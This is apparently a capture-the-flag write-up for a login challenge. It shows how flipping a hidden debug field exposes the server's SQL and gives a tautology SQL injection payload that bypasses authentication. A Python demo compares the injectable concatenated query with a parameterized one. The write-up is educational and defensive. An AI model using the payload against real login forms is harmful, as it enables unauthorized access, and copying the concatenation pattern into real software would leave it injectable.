Irish-Name-Repo-1

On inspecting the login page:

<form action="login.php" method="POST">
    <fieldset>
        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" class="form-control">
        </div>
        <div class="form-group">
            <label for="password">Password:</label>
            <div class="controls">
                <input type="password" id="password" name="password" class="form-control">
            </div>
        </div>
        <input type="hidden" name="debug" value="0">

        <div class="form-actions">
            <input type="submit" value="Login" class="btn btn-primary">
        </div>
    </fieldset>
</form>

Edit the HTML in the browser's inspector and change the hidden debug field's value from 0 to 1, so the server echoes the query it builds.

On trying to log in, we get:

username: user
password: pass
SQL query: SELECT * FROM users WHERE name='user' AND password='pass'

SQL injection:

username: ' OR '1'='1
password: ' OR '1'='1
SQL query: SELECT * FROM users WHERE name='' OR '1'='1' AND password='' OR '1'='1'
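To show why that payload logs in and how the query should have been written, here is an added example (not part of the original writeup or the challenge's login.php): it rebuilds the concatenated query from the debug output, runs it against a constructed in-memory SQLite table, and compares it with a parameterized version. Because AND binds tighter than OR, the injected WHERE clause parses as name='' OR ('1'='1' AND password='') OR '1'='1', which is true for every row.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the challenge's users table (sample data, not the real one).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret'), ('user', 'pass')")
    return conn


def build_query(username, password):
    # String concatenation, exactly what the debug output shows the backend doing.
    return f"SELECT * FROM users WHERE name='{username}' AND password='{password}'"


def login_vulnerable(conn, username, password):
    # Executes the concatenated query; returns how many rows it matched.
    return len(conn.execute(build_query(username, password)).fetchall())


def login_parameterized(conn, username, password):
    # Bound parameters: the input is passed as data and never parsed as SQL,
    # so quotes inside it cannot change the query's structure.
    rows = conn.execute(
        "SELECT * FROM users WHERE name=? AND password=?", (username, password)
    ).fetchall()
    return len(rows)


if __name__ == "__main__":
    conn = make_db()
    tautology = "' OR '1'='1"
    print(build_query(tautology, tautology))
    print("vulnerable rows:", login_vulnerable(conn, tautology, tautology))        # 2
    print("parameterized rows:", login_parameterized(conn, tautology, tautology))  # 0
```

Logging the built query (as the debug flag does here) is itself a finding: it leaks the schema and confirms the concatenation to anyone who can flip a client-side field.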